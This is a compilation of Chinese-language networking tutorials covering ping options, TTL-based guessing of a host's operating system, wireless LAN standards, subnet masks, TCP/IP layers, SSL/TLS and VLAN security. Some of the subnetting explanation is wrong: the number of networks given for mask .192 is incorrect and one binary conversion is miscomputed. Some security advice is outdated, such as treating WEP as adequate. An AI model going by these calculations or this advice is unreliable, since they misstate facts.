
-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。

-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量为 9。

-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量为 9。

-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔，单位为毫秒。
此参数没有什么其他技巧。
    ping命令的其他技巧：在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然TTL的值在对方的主机里是可以修改的，Windows系列的系统可以通过修改注册表以下键值实现：
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20


SOHO局域网首选无线

《一键清理系统垃圾》

SOHO局域网首选无线

    如今，无线局域网技术正在以惊人的速度发展，随着无线局域网设备性能的提高及价格的降低，它已经成为许多用户特别是小型用户和家庭用户构建局域网的首选。现
    早在20世纪90年代初，工作在900MHz、2.4GHz和5GHz（未经FCC授权）频点上的无线局域网设备就已经出现了，但是由于价格、性能、通用性等种种原因，它们没有得到广泛的应用。1997年6月，第一个无线局域网标准IEEE802.11正式颁布实施，它为无线局域网的物理层和MAC层提供了统一的标准。在物理标准方面，IEEE802.11提供了三种选择：DSSS（直接序列扩频）技术、FHSS(跳频扩频)技术和漫射红外线技术。根据这一标准，所有无线局域网设备的基准数据传输率为1Mbps，同时它们都具有以2Mbps传输速率传送数据的能力。几乎所有的无线网络设备供应商在生产符合IEEE802.11标准的设备时都选择了DSSS技术，没有一家选择漫射红外线技术。

    1998年6月，IEEE又提出了一个新标准IEEE802.11b，由于几乎所有的供应商都使用DSSS，新标准的物理层相应地修订为只支持工作在2.4GHz的DSSS。IEEE802.11b 相对于IEEE802.11的主要进步是增加了对5.5Mbps数据传输速率和11Mbps数据传输速率的支持。

    数据传输速率的增加并不只是简单地加快系统时钟的频率，通信链路的带宽是其中的关键因素。对于无线局域网来说，可用的RF频率很少，通过增加频段来增加带宽的方法是行不通的。IEEE802.11b通过采用一个新的调制方式CCK（complementary code keying）解决了这一问题，简单地说，CCK可以将更多的数据打包进传输信号中，从而增加了带宽、提高了数据传输速率。对于IEEE802.11系统，当系统工作在1Mbps时，采用的调制方法为BPSK，按照BPSK，每个信号只能携带1个比特，这样每秒钟大约要传送一百万个信号才能使数据传输速率达到1Mbps。当系统工作在2Mbps时，采用的调制方法为QPSK，它可以使每个信号携带两个比特，这样在信号传输速率不变的情况下，就可以达到2Mbps的数据传输速率。而采用了CCK的IEEE802.11b系统可以使每个信号携带四个比特，同时它的信号传输速率也提升为1.375Msps，这样它的数据传输率就可以达到11Mbps。

    最简单的设计方式

    无线局域网在设计方面并不复杂，它只包括两个组成部分：接入点和客户机。任何一个客户机都可以和其他任何网络设备（包括客户机）进行通信,所以主要工作都集中在软件配置方面。

    无线局域网最简单的构成方式是不包括接入点的计算机对计算机结构。采用这种结构，可以在一分钟内在一间会议室里建立一个无线局域网，然后就可以在便携式计算机之间以11Mbps的速率传送数据。如果将无线局域网配置为无接入点的计算机对计算机的结构，所有在这个局域网中的计算机都通过相同数据通道互相通讯，这与有线局域网的工作方式非常相似。这种简单设置的无线局域网有一个明显的缺点，即无线网中的计算机无法共享公司已有的有线局域网中的资源。

    通常，无线局域网采用包含接入点的网络结构，无线局域网的接入点设备分布在公司有线局域网的各个地方，通过它们，装配有无线局域网适配器的计算机就可以直接接入公司的局域网，接入点的作用就如同无线的HUB。在配置无线局域网接入点时，必须为每个客户机定义一个网络名ESSID（Extended Service Set ID），无线局域网客户机必须通过ESSID与一个接入点相连。如果一个子网中有多个接入点，应为它们配置相同的ESSID。

    在客户端可以测量来自接入点的载波信号的强度，可以把这一数据作为依据，优化接入点在工作区内的配置，尽量使所有的无线客户机都能够接收到强度令人满意的信号。如果信号强度较低，但又不想增加接入点，为它增加一个高增益天线或许会有所帮助。

    拥有多个接入点的IEEE802.11无线局域网支持漫游功能，这一特性内建在IEEE802.11标准中。无线用户可以由一个接入点自由移动并无缝连接到另一个接入点。当一个无线用户失去了与一个接入点的信号后，无线局域网适配器就会自动地寻找下一个接入点，一旦找到，它就会与新接入点建立连接并断开与旧接入点的连接。如果精心布置接入点，就可以使移动用户走遍整个无线局域网而不失去与网络的连接。

    有放心的安全

    无线传输的特性决定了它对安全性有特别的要求，一个没有安全措施的无线局域网对于任何处在它的覆盖范围之内的移动客户都是开放的。想象一下，如果没有安全设施，竞争对手就可以在你的办公地点附近用一台便携式计算机接入到你的网络中获取情报。

    部分无线局域网设备供应商，例如Lucent公司，提供了配置封闭式无线局域网的技术，在这个网络中，客户不能扫描整个区域寻找接入点，它必须广播自身的ESSID给邻近的接入点，由接入点应答并向它提供接入服务。这样，只要ESSID不被泄漏，就能够阻止非法侵人。

    对于不想使用封闭式无线局域网的用户，WEP是另一种安全选择。WEP为无线局域网提供了用户身份鉴定和加密功能，所有在无线局域网中传输的数据都使用WEP密钥加密，在加密时，收发双方都必须知道WEP密钥，只要做好密钥的保密工作，就可以阻止非法侵入。

    三种实施方案

    在IEEE802.11阵营以外，还有两种无线局域网解决方案，一种是HomeRF，一种是Bluetooth（蓝牙技术）。HomeRF是一种基于FHSS的低成本的解决方案，它的数据传输速率为2Mbps，它主要面向家庭用户。HomeRF对多媒体（声音、MPEG图像）有较好的支持，这样对于家庭用户来说，它就可以将各种家用电器连接在一起。Bluetooth最初是由Ericsson开发的，现在有很多供应商都在提供Bluetooth产品。Bluetooth是一种短距离（10米）、低成本、低速率（低于1Mbps）的无线局域网解决方案。

    这三种解决方案（IEEE802.11b、HomeRF和Bluetooth）估计将会在市场上进行激烈的竞争，虽然有所重叠，但它们各有各的用户范围：IEEE802.11b以较高的性能面对的是中小型企业级用户，HomeRF面向的则是家庭用户，而Bluetooth将会首先运用于手机、家庭及办公室电话、小型PBX等电话系统中。这三种解决方案都工作在2.4GHz，都采用扩频技术，IEEE802.11b采用的是DSSS，而HomeRF和Bluetooth采用的是跳频方式。

返回


TCPIP完整的一套基础介绍（二）

《一键清理系统垃圾》

TCPIP完整的一套基础介绍（二）

以下内容是子网的设定

若公司不上Internet,那一定不会烦恼IPAddress的问题,因 为可以任意使用所有的IPAddress,不管是AClass或是BClass, 这个时候不会想到要用SubNet,但若是上Internet那IPAddress 便弥足珍贵了,目前全球一阵Internet热,IPAddress已经愈 来愈少了,而所申请的IPAddress目前也趋保守,而且只有 经申请的IPAddress能在Internet使用,但对某些公司只能申 请到一个CCLass的IPAddress,但又有多个点需要使用,那这 时便需要使用到Subnet,这篇短文说明Subnet的原理及如 何规划。

SubnetMask的介绍
设定任何网路上的任何设备不管是主机、PC、Router等 皆需要设定IPAddress,而跟随著IPAddress的是所谓的NetMask, 这个NetMask主要的目的是由IPAddress中也能获得NetworkNumber ,也就是说IPAddress和NetMask作AND而得到NetworkNumber,如下所 示

IPAddress　　 192.10.10.6　　11000000.00001010.00001010.00000110
NetMask　　　 255.255.255.0　11111111.11111111.11111111.00000000
AND -------------------------------------------------------------------
etworkNumber　192.10.10.0　　11000000.00001010.00001010.00000000

NetMask有所谓的预设值,如下所示

Class　IPAddress范围　　NetMask
A　1.0.0.0-126.255.255.255　 255.0.0.0
B　128.0.0.0-191.255.255.255　 255.255.0.0
C　192.0.0.0-223.255.255.255　 255.255.255.0

在预设的NetMask都只有255的值,在谈到SubnetMask时这个值 便不一定是255了。
在完整一组CClass中如203.67.10.0-203.67.10.255NetMask255.255.255.0, 203.67.10.0称之NetworkNumber(将IPAddress和Netmask作AND),而 203.67.10.255是Broadcast的IPAddress,所以这?两者皆不能使用,实 际只能使用203.67.10.1--203.67.10.254等254个IPAddress,这是以 255.255.255.0作NetMask的结果,而所谓SubnetMsk尚可将整组C Class分成数组NetworkNumber,这要在NEtMask作手脚,若是要将 整组CCLass分成2个NetworkNumber那NetMask设定为255.255.255.192, 若是要将整组CCLass分成8组NetworkNumber则NetMask要为 255.255.255.224,这是怎麽来的,由以上知道NetworkNumber是由IP Address和NetMask作AND而来的,而且将NetMask以二进位表示 法知道是1的会保留,而为0的去掉

192.10.10.193--11000000.00001010.00001010.10000001
255.255.255.0--11111111.11111111.11111111.00000000
--------------------------------------------------------------
192.10.10.0----11000000.00001010.00001010.00000000

以上是以255.255.255.0为NetMask的结果,NetworkNumber是192.10.10.0, 若是使用255.255.255.224作NetMask结果便有所不同

192.10.10.193----11000000.00001010.00001010.10000000
255.255.255.224--11111111.11111111.11111111.11100000
--------------------------------------------------------------
192.10.10.192----11000000.00001010.00001010.10000000

此时NetworkNumber变成了192.10.10.192,这便是Subnet。
那要如何决定所使用的NetMask,255.255.255.224以二进位表示 法为11111111.11111111.11111111.11100000,变化是在最後一组,11100000 便是224,以三个Bit可表示2的3次方便是8个NetworkNumber

NetMask二进位表示法可分几个Network

255.255.255.0 11111111.11111111.11111111.000000001
255.255.255.128 11111111.11111111.11111111.100000002
255.255.255.192 11111111.11111111.11111111.110000004
255.255.255.224 11111111.11111111.11111111.111000008
255.255.255.240 11111111.11111111.11111111.1111000016
255.255.255.248 11111111.11111111.11111111.1111100032
255.255.255.252 11111111.11111111.11111111.1111110064

以下使用255.255.255.224将C　Class203.67.10.0分成8组NetworkNumber,各 个NetworkNumber及其BroadcastIPAddress及可使用之IPAddress

序号NetworkNumberBroadcast可使用之IPAddress

1 203.67.10.0 203.67.10.31 203.67.10.1-203.67.10.30
2 203.67.10.32 203.67.10.63 203.67.10.33-203.67.10.62
3 203.67.10.64 203.67.10.95 203.67.10.65-203.67.10.94
4 203.67.10.96 203.67.10.127 203.67.10.97-203.67.10.126
5 203.67.10.128 203.67.10.159 203.67.10.129-203.67.10.158
6 203.67.10.160 203.67.10.191 203.67.10.161-203.67.10.190
7 203.67.10.192 203.67.10.223 203.67.10.193-203.67.10.222
8 203.67.10.224 203.67.10.255 203.67.10.225-203.67.10.254

可验证所使用的IPAddress是否如上表所示

203.67.10.115----11001011.01000011.00001010.01110011
255.255.255.224--11111111.11111111.11111111.11100000
--------------------------------------------------------------
203.67.10.96-----11001011.01000011.00001010.01100000

203.67.10.55-----11001011.01000011.00001010.00110111
255.255.255.224--11111111.11111111.11111111.11100000
--------------------------------------------------------------
203.67.10.32-----11001011.01000011.00001010.00100000

其他的NetMask所分成的NetworkNumber可自行以上述方法自行推演出来。

Subnet的应用
使用Subnet是要解决只有一组CClass但需要数个NetworkNumber的问题,并不是解决IPAddress不够用的问题,因为使用 Subnet反而能使用的IPAddress会变少,Subnet通常是使用在总公司在台北,但分公司在台中,两者之间使用Router连线 ,同时也上Internet,但只申请到一组CCLassIPAddress,过Router又需不同的Network,所以此时就必须使用到Subnet,当然二 办公司间可以RemoteBridge连接,那便没有使用Subnet的问题,这点在此不讨论。


TCPIP完整的一套基础介绍（六）

《一键清理系统垃圾》

TCPIP完整的一套基础介绍（六）

应用层的安全性

必须牢记(且须仔细品味): 网络层(传输层)的安全协议允许为主机(进程)之间的数据通道增加安全属性。本质上，这意味着真正的(或许再加上机密的)数据通道还是建立在主机(或进程)之间，但却不可能区分在同一通道上传输的一个具体文件的安全性要求。比如说，如果一个主机与另一个主机之间建立起一条安全的IP通道，那么所有在这条通道上传输的IP包就都要自动地被加密。同样，如果一个进程和另一个进程之间通过传输层安全协议建立起了一条安全的数据通道，那么两个进程间传输的所有消息就都要自动地被加密。

如果确实想要区分一个具体文件的不同的安全性要求，那就必须借助于应用层的安全性。提供应用层的安全服务实际上是最灵活的处理单个文件安全性的手段。例如一个电子邮件系统可能需要对要发出的信件的个别段落实施数据签名。较低层的协议提供的安全功能一般不会知道任何要发出的信件的段落结构，从而不可能知道该对哪一部分进行签名。只有应用层是唯一能够提供这种安全服务的层次。

一般来说，在应用层提供安全服务有几种可能的做法，第一个想到的做法大概就是对每个应用(及应用协议)分别进行修改。一些重要的TCP/IP应用已经这样做了。在RFC 1421至1424中，IETF规定了私用强化邮件(PEM)来为基于SMTP的电子邮件系统提供安全服务。由于种种理由，Internet业界采纳PEM的步子还是太慢，一个主要的原因是PEM依赖于一个既存的、完全可操作的PKI(公钥基础结构)。PEM PKI是按层次组织的，由下述三个层次构成:

顶层为Internet安全政策登记机构(IPRA)
次层为安全政策证书颁发机构(PCA)
底层为证书颁发机构(CA)
建立一个符合PEM规范的PKI也是一个政治性的过程，因为它需要多方在一个共同点上达成信任。不幸的是，历史表明，政治性的过程总是需要时间的，作为一个中间步骤，Phil Zimmermann开发了一个软件包，叫做PGP(pretty Good Privacy)。PGP符合PEM的绝大多数规范，但不必要求PKI的存在。相反，它采用了分布式的信任模型，即由每个用户自己决定该信任哪些其他用户。因此，PGP不是去推广一个全局的PKI，而是让用户自己建立自己的信任之网。这就立刻产生一个问题，就是分布式的信任模型下，密钥废除了怎么办。

S-HTTP是Web上使用的超文本传输协议(HTTP)的安全增强版本，由企业集成技术公司设计。S-HTTP提供了文件级的安全机制，因此每个文件都可以被设成私人/签字状态。用作加密及签名的算法可以由参与通信的收发双方协商。S-HTTP提供了对多种单向散列(Hash)函数的支持，如: MD2，MD5及SHA; 对多种单钥体制的支持，如：DES，三元DES，RC2，RC4，以及CDMF; 对数字签名体制的支持，如: RSA和DSS。

目前还没有Web安全性的公认标准。这样的标准只能由WWW Consortium，IETF或其他有关的标准化组织来制定。而正式的标准化过程是漫长的，可能要拖上好几年，直到所有的标准化组织都充分认识到Web安全的重要性。S-HTTP和SSL是从不同角度提供Web的安全性的。S-HTTP对单个文件作"私人/签字"之区分，而SSL则把参与通信的相应进程之间的数据通道按"私用"和"已认证"进行监管。Terisa公司的SecureWeb工具软件包可以用来为任何Web应用提供安全功能。该工具软件包提供有 RSA数据安全公司的加密算法库，并提供对SSL和S-HTTP的全面支持。

另一个重要的应用是电子商务，尤其是信用卡交易。为使Internet上的信用卡交易安全起见，MasterCard公司(同IBM，Netscape，GTE和Cybercash一道) 制定了安全电子付费协议(SEPP)，Visa国际公司和微软(和其他一些公司一道)制定了安全交易技术(STT)协议。同时，MasterCard，Visa国际和微软已经同意联手推出Internet上的安全信用卡交易服务。他们发布了相应的安全电子交易(SET)协议，其中规定了信用卡持卡人用其信用卡通过Internet进行付费的方法。这套机制的后台有一个证书颁发的基础结构，提供对X.509证书的支持。

上面提到的所有这些加安全功能的应用都会面临一个主要的问题，就是每个这样的应用都要单独进行相应的修改。因此，如果能有一个统一的修改手段，那就好多了。通往这个方向的一个步骤就是赫尔辛基大学的Tatu Yloenen开发的安全shell(SSH)。SSH允许其用户安全地登录到远程主机上，执行命令，传输文件。它实现了一个密钥交换协议，以及主机及客户端认证协议。SSH有当今流行的多种Unix系统平台上的免费版本，也有由Data Fellows公司包装上市的商品化版本。

把SSH的思路再往前推进一步，就到了认证和密钥分配系统。本质上，认证和密钥分配系统提供的是一个应用编程界面(API)，它可以用来为任何网络应用程序提供安全服务，例如: 认证、数据机密性和完整性、访问控制以及非否认服务。目前已经有一些实用的认证和密钥分配系统，如: MIT的Kerberos(V4与V5)，IBM的CryptoKnight和Netwrok Security Program，DEC的SPX，Karlsruhe大学的指数安全系统(TESS)等，都是得到广泛采用的实例。甚至可以见到对有些认证和密钥分配系统的修改和扩充。例如，SESAME和OSF DCE对Kerberos V5作了增加访问控制服务的扩充，Yaksha对Kerberos V5作了增加非否认服务的扩充。

关于认证和密钥分配系统的一个经常遇到的问题是关于它们在Internet上所受到的冷遇。一个原因是它仍要求对应用本身做出改动。考虑到这一点，对一个认证和密钥分配系统来说，提供一个标准化的安全API就显得格外重要。能做到这一点，开发人员就不必再为增加很少的安全功能而对整个应用程序大动手术了。因此，认证系统设计领域内最主要的进展之一就是制定了标准化的安全API，即通用安全服务API(GSS-API)。GSS-API(v1及v2)对于一个非安全专家的编程人员来说可能仍显得过于技术化了些，但德州Austin大学的研究者们开发的安全网络编程(SNP)，把界面做到了比GSS-API更高的层次，使同网络安全性有关的编程更加方便了。


TCPIP完整的一套基础介绍（七）

《一键清理系统垃圾》

TCPIP完整的一套基础介绍（七）

局域网在网络层不安全的地方

由于局域网中采用广播方式，因此，若在某个广播域中可以侦听到所有的信息包，黑客就对可以对信息包进行分析，那么本广播域的信息传递都会暴露在黑客面前。

网络分段

网络分段是保证安全的一项重要措施，同时也是一项基本措施，其指导思想在于将非法用户与网络资源相互隔离，从而达到限制用户非法访问的目的。

网络分段可分为物理分段和逻辑分段两种方式：
物理分段通常是指将网络从物理层和数据链路层（ISO/OSI模型中的第一层和第二层）上分为若干网段，各网段相互之间无法进行直接通讯。目前，许多交换机都有一定的访问控制能力，可实现对网络的物理分段。逻辑分段则是指将整个系统在网络层（ISO/OSI模型中的第三层）上进行分段。例如，对于TCP/IP网络，可把网络分成若干IP子网，各子网间必须通过路由器、路由交换机、网关或防火墙等设备进行连接，利用这些中间设备（含软件、硬件）的安全机制来控制各子网间的访问。在实际应用过程中，通常采取物理分段与逻辑分段相结合的方法来实现对网络系统的安全性控制。

VLAN的实现

虚拟网技术主要基于近年发展的局域网交换技术(ATM和以太网交换)。交换技术将传统的基于广播的局域网技术发展为面向连接的技术。因此，网管系统有能力限制局域网通讯的范围而无需通过开销很大的路由器。

以太网从本质上基于广播机制，但应用了交换器和VLAN技术后，实际上转变为点到点通讯，除非设置了监听口，信息交换也不会存在监听和插入（改变）问题。

由以上运行机制带来的网络安全的好处是显而易见的：
信息只到达应该到达的地点。因此、防止了大部分基于网络监听的入侵手段。
通过虚拟网设置的访问控制，使在虚拟网外的网络节点不能直接访问虚拟网内节点。

但是，虚拟网技术也带来了新的安全问题：
执行虚拟网交换的设备越来越复杂，从而成为被攻击的对象。基于网络广播原理的入侵监控技术在高速交换网络内需要特殊的设置。基于MAC的VLAN不能防止MAC欺骗攻击。
采用基于MAC的VLAN划分将面临假冒MAC地址的攻击。因此，VLAN的划分最好基于交换机端口。但这要求整个网络桌面使用交换端口或每个交换端口所在的网段机器均属于相同的VLAN。

VLAN之间的划分原则

VLAN的划分方式的目的是保证系统的安全性。因此，可以按照系统的安全性来划分VLAN;可以将总部中的服务器系统单独划作一个VLAN,如数据库服务器、电子邮件服务器等。也可以按照机构的设置来划分VLAN，如将领导所在的网络单独作为一个Leader VLAN(LVLAN), 其他司局（或下级机构）分别作为一个VLAN,并且控制LVLAN与其他VLAN之间的单向信息流向，即允许LVLAN查看其他VLAN的相关信息，其他VLAN不能访问LVLAN的信息。VLAN之内的连接采用交换实现， VLAN与VLAN之间采用路由实现。由于路由控制的能力有限，不能实现LVLAN与其他VLAN之间的单向信息流动，需要在LVLAN与其他VLAN之间设置一个Gauntlet防火墙作为安全隔离设备，控制VLAN与VLAN之间的信息交流


TCPIP完整的一套基础介绍（三）

《一键清理系统垃圾》

TCPIP完整的一套基础介绍（三）

TCP/IP（传输控制协议/网间协议）是一种网络通信协议，它规范了网络上的所有通信设备，尤其是一个主机与另一个主机之间的数据往来格式以及传送方式。TCP/IP是INTERNET的基础协议，也是一种电脑数据打包和寻址的标准方法。在数据传送中，可以形象地理解为有两个信封，TCP和IP就像是信封，要传递的信息被划分成若干段，每一段塞入一个TCP信封，并在该信封面上记录有分段号的信息，再将TCP信封塞入IP大信封，发送上网。在接受端，一个TCP软件包收集信封，抽出数据，按发送前的顺序还原，并加以校验，若发现差错，TCP将会要求重发。因此，TCP/IP在INTERNET中几乎可以无差错地传送数据。

在任何一个物理网络中,各站点都有一个机器可识别的地址,该地址叫做物理地址.

特点:
物理地址的长度,格式等是物理网络技术的一部分,物理网络不同,物理地址也不同.
同一类型不同网络上的站点可能拥有相同的物理地址.
以上两点决定了,不能用物理网络进行网间网通讯.

在网络术语中，协议中，协议是为了在两台计算机之间交换数据而预先规定的标准。TCP/IP并不是一个而是许多协议，这就是为什么你经常听到它代表一个协议集的原因，而TCP和IP只是其中两个基本协议而已。

你装在计算机-的TCP/IP软件提供了一个包括TCP、IP以及TCP/IP协议集中其它协议的工具平台。特别是它包括一些高层次的应用程序和FTP(文件传输协议)，它允许用户在命令行上进行网络文件传输。

TCP/IP是美国政府资助的高级研究计划署(ARPA)在二十世纪七十年代的一个研究成果，用来使全球的研究网络联在一起形成一个虚拟网络，也就是国际互联网。原始的

Internet通过将已有的网络如ARPAnet转换到TCP/IP上来而形成，而这个Internet最终成为如今的国际互联网的骨干网。

如今TCP/IP如此重要的原因，在于它允许独立的网格加入到Internet或组织在一起形成私有的内部网（Intranet）。构成内部网的每个网络通过一种-做路由器或IP路由器的设备在物理上联接在一起。路由器是一台用来从一个网络到另一个网络传输数据包的计算机。在一个使用TCP/IP的内部网中，信息通过使用一种独立的叫做IP包（IPpacket）或IP数据报(IPdatagrams)的数据单元进--传输。TCP/IP软件使得每台联到网络上的计算机同其它计算机"看"起来一模一样，事实上它隐藏了路由器和基本的网络体系结构并使其各方面看起来都像一个大网。如同联入以太网时需要确认一个48位的以太网地址一样，联入一个内部网也需要确认一个32位的IP地址。我们将它用带点的十进制数表示，如128.10.2.3。给定一个远程计算机的IP地址，在某个内部网或Internet上的本地计算机就可以像处在同一个物理网络中的两台计算机那样向远程计算机发送数据。


TCPIP完整的一套基础介绍（四）

《一键清理系统垃圾》

TCPIP完整的一套基础介绍（四）

TCP/IP提供了一个方案用来解决属于同一个内部网而分属不同物理网的两台计算机之间怎样交换数据的问题。这个方案包括许多部分，而TCP/IP协议集的每个成员则用来解决问题的某一部分。如TCP/IP协议集中最基本的协议-IP协议用来在内部网中交换数据并且执行一项重要的功能：路由选择－－选择数据报从A主机到B主机将要经过的路径以及利用合适的路由器完成不同网络之间的跨越（hop）。

TCP是一个更高层次的它允许运行在在不同主机上的应用程序相互交换数据流。TCP将数据流分成小段叫做TCP数据段（TCPsegments），并利用IP协议进行传输。在大多数情况下，每个TCP数据段装在一个IP数据报中进行发送。但如需要的话，TCP将把数据段分成多个数据报，而IP数据报则与同一网络不同主机间传输位流和字节流的物理数据帧相容。由于IP并不能保证接收的数据报的顺序相一致，TCP会在收信端装配TCP数据段并形成一个不间断的数据流。FTP和Telnet就是两个非常流行的依靠TCP的TCP/IP应用程序。

另一个重要的TCP/IP协议集的成员是用户数据报协议(UDP)，它同TCP相似但比TCP原始许多。TCP是一个可靠的协议，因为它有错误检查和握手确认来保证数据完整的到达目的地。UDP是一个"不可靠"的协议，因为它不能保证数据报的接收顺序同发送顺序相同，甚至不能保证它们是否全部到达。如果有可靠性要求，则应用程序避免使用它。同许多TCP/IP工具同时提供的SNMP(简单网络管理协议)就是一个使用UDP协议的应用例子。

其它TCP/IP协议在TCP/IP网络中工作在幕后，但同样也发挥着重要作用。例如地址转换协议(ARP)将IP地址转换为物理网络地址如以太网地址。而与其对应的反向地址转换协议(RARP)做相反的工作，即将物理网络地址转换为IP地址。网际控制报文协议(ICMP)则是一个支持性协议，它利用IP完成IP数据报在传输时的控制信息和错误信息的传输。例如，如果一个路由器不能向前发送一个IP数据报，它就会利用ICMP来告诉发送者这里出现了问题。

网络设计者在解决网络体系结构时经常使用ISO/OSI（ 国际标准化组织/开放系统互连）七层模型，该模型每 一层代表一定层次的网络功能。最下面是物理层，它 代表着进行数据转输的物理介质，换句话说，即网络 电缆。其上是数据链路层，它通过网络接口卡提供服 务。最上层是应用层，这里运行着使用网络服务的应 用程序。

TCP/IP是同ISO/OSI模型等价的。当一个数据单元 从网络应用程序下流到网络接口卡，它通过了一列的TCP/IP 模块。这其中的每一步，数据单元都会同网络另一端 对等TCP/IP模块所需的信息一起打成包。这样当数据最 终传到网卡时，它成了一个标准的以太帧(假设物理 网络是以太网)。而接收端的TCP/IP软件通过剥去以太网 帧并将数据向上传输过TCP/IP栈来为处于接收状态的应 用程序重新恢复原始数据(一种最好的了解TCP/IP工作实 质的方法，是使用探测程序来观察网络中的到处流动 的帧中被不同TCP/IP模块所加上的信息)。

为了勾勒TCP/IP在现实网络世界中所扮演的角色， 请考虑当使用HTTP(超文本传输协议)的Web浏览器从连接 在Internet上的Web服务器上获取一页HTML数据时所发生的情 况。为形成同Web服务器的虚链路，浏览器使用一种被 抽象地称为套接口(socket)的高层软件。为了获 取Web页，它通过向套接口向套接口写入HTTPGET命令来向Web 服务器发出该指令。接下来套接口软件使用TCP协议向 Web服务器发出包含GET命令的字节流和位流，TCP将数据 分段并将各独立段传到IP模块，该模块将数据段转换 成数据报并发送给Web服务器。

如果浏览器和服务器运--在不同物理网络的计 算机上(一般情况如此)，数据报从一个网络传到另一 个网络，直到抵达服务器所在的那个网。最终，数据 被传输到目的地址并被重新装配，这样Web服务器通过 读自己的套接口来获得数据主干，并进而查看连续的 数据流。对浏览器和服务器来说，数据在这一端写入 套接口而在另一端出现如同魔术一般，但这只是底 下发生的各种复杂的交互，它创造了数据经过网络无 缝传输的假象。

这就是TCP/IP所做的：将许多小网联成一个大网。 并在这个大网也就是Internet上提供应用程序所需要的 相互通信的服务。


TCPIP完整的一套基础介绍（五）

《一键清理系统垃圾》

TCPIP完整的一套基础介绍（五）

对于TCP/IP有许多可谈的，但这里仅讲三个关键点：

·TCP/IP是一族用来把不同的物理网络联在一 起构成网际网的协议。TCP/IP联接独立的网络形成一个 虚拟的网，在网内用来确认各种独立的不是物理网络 地址，而是IP地址。

·TCP/IP使用多层体系结构，该结构清晰定义了 每个协议的责任。TCP和UDP向网络应用程序提供了高层 的数据传输服务，并都需要IP来传输数据包。IP有责任 为数据包到达目的地选择合适的路由。

·在Internet主机上，两个运行着的应用程序之 间传送要通过主机的TCP/IP堆栈上下移动。在发送端TCP/IP 模块加在数据上的信息将在接收端对应的TCP/IP模块上 滤掉，并将最终恢复原始数据。

如果你有兴趣学习更多的TCP/IP知识，这里有两个 较高层次的信息源RFC(RequestforComment)1180--叫做"TCP/IP Tutorial"的文档，你可以从许多普及的RFC的Internet节点上 下载。另一个是InternetworkingwithTCP/IP的第一卷：Principles，Protocols，and Architectures，作者DouglasE.Comer(1995，Prentice-Hall)。作为该系三部 曲中的第一部分，许多人把看成是一本TCP/IP圣经。（原 文刊载于Vol.15No.20）

传输层的安全性

在Internet应用编程序中，通常使用广义的进程间通信(IPC)机制来与不同层次的安全协议打交道。比较流行的两个IPC编程界面是BSD Sockets和传输层界面(TLI)，在Unix系统V命令里可以找到。

在Internet中提供安全服务的首先一个想法便是强化它的IPC界面，如BSD Sockets等，具体做法包括双端实体的认证，数据加密密钥的交换等。Netscape通信公司遵循了这个思路，制定了建立在可靠的传输服务(如TCP/IP所提供)基础上的安全套接层协议(SSL)。SSL版本3(SSL v3)于1995年12月制定。它主要包含以下两个协议：

SSL记录协议 它涉及应用程序提供的信息的分段、压缩、数据认证和加密。SSL v3提供对数据认证用的MD5和SHA以及数据加密用的R4和DES等的支持，用来对数据进行认证和加密的密钥可以通过SSL的握手协议来协商。
SSL握手协议 用来交换版本号、加密算法、(相互)身份认证并交换密钥。SSL v3 提供对Deffie-Hellman密钥交换算法、基于RSA的密钥交换机制和另一种实现在 Fortezza chip上的密钥交换机制的支持。
Netscape通信公司已经向公众推出了SSL的参考实现(称为SSLref)。另一免费的SSL实现叫做SSLeay。SSLref和SSLeay均可给任何TCP/IP应用提供SSL功能。Internet号码分配当局(IANA)已经为具备SSL功能的应用分配了固定端口号，例如，带SSL的 HTTP(https)被分配的端口号为443，带SSL的SMTP(ssmtp)被分配的端口号为465，带SSL的NNTP(snntp)被分配的端口号为563。

微软推出了SSL2的改进版本称为PCT(私人通信技术)。至少从它使用的记录格式来看，SSL和PCT是十分相似的。它们的主要差别是它们在版本号字段的最显著位(The Most Significant Bit)上的取值有所不同: SSL该位取0，PCT该位取1。这样区分之后，就可以对这两个协议都给以支持。

1996年4月，IETF授权一个传输层安全(TLS)工作组着手制定一个传输层安全协议(TLSP)，以便作为标准提案向IESG正式提交。TLSP将会在许多地方酷似SSL。

前面已介绍Internet层安全机制的主要优点是它的透明性，即安全服务的提供不要求应用层做任何改变。这对传输层来说是做不到的。原则上，任何TCP/IP应用，只要应用传输层安全协议，比如说SSL或PCT，就必定要进行若干修改以增加相应的功能，并使用(稍微)不同的IPC界面。于是，传输层安全机制的主要缺点就是要对传输层IPC界面和应用程序两端都进行修改。可是，比起Internet层和应用层的安全机制来，这里的修改还是相当小的。另一个缺点是，基于UDP的通信很难在传输层建立起安全机制来。同网络层安全机制相比，传输层安全机制的主要优点是它提供基于进程对进程的(而不是主机对主机的)安全服务。这一成就如果再加上应用级的安全服务，就可以再向前跨越一大步了。


TCPIP完整的一套基础介绍（一）

《一键清理系统垃圾》

TCPIP完整的一套基础介绍（一）

TCP/IP应该是个协议集，根据OS的七层理论，TCP/IP分为四层．分别是应用，传输，Interne和网络界面．

我们一般说TCP在传输层，而IP在Internet层．

TCP/IP的应用程序包括我们平时经常用到的Ping,Telnet,Ftp,Finger等等

配置TCP/IP包括IP地址（IPAddress），子网掩码（SubnetMask）和缺省网关

正确检测TCP/IP的四个步骤：Ping 127.0.0.1（回环地址，也称本机地址）如果通表示TCP/IP已经装入，Ping自己表明客户机正常（主要是网卡），Ping网关表示局域网正常，Ping路由外地址表示完全正常，当然你也可以直接进行第四步，一般来说没这么麻烦的，但理论是基础:-)

IP地址是四段八位的二进制数组成的，IP分为A,B,C,D,E五类地址

A类高端为0,从1.x.y.z--126.x.y.z；B类高端为10,从128.x.y.z--191.x.y.z；C类高端为110，从192.x.y.z--223.x.y.z；D类高端为1110是保留的IP地址；E类高端为1111，是科研用的IP地址

其中255是广播地址，127是内部回送函数

